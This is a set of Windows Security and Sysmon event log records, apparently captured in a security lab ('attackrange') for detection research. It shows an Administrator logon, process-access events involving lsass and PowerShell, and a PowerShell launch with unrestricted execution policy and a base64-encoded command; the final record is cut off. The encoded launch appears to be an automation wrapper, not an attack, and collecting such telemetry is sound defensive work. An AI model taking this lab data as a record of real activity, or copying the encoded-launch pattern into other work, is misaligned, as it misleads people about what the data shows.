{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220647,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA57A6\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{81230AE6-A126-C486-C5E2-C056E47315D0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa57a6","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{81230AE6-A126-C486-C5E2-C056E47315D0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220648,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA57A6\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa57a6","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5396,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5397,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5398,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-001085560A00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-001085560A00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5399,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.109\r\nProcessGuid: {A837DB8D-032E-5F25-0000-001085560A00}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_neenlzzs.ycu.ps1\r\nCreationUtcTime: 2020-08-01 05:52:46.109","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.109","ProcessGuid":"{A837DB8D-032E-5F25-0000-001085560A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_neenlzzs.ycu.ps1","CreationUtcTime":"2020-08-01 05:52:46.109","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5400,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-001085560A00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-001085560A00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5401,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-001085560A00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-001085560A00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5402,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.209\r\nProcessGuid: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nProcessId: 796\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: 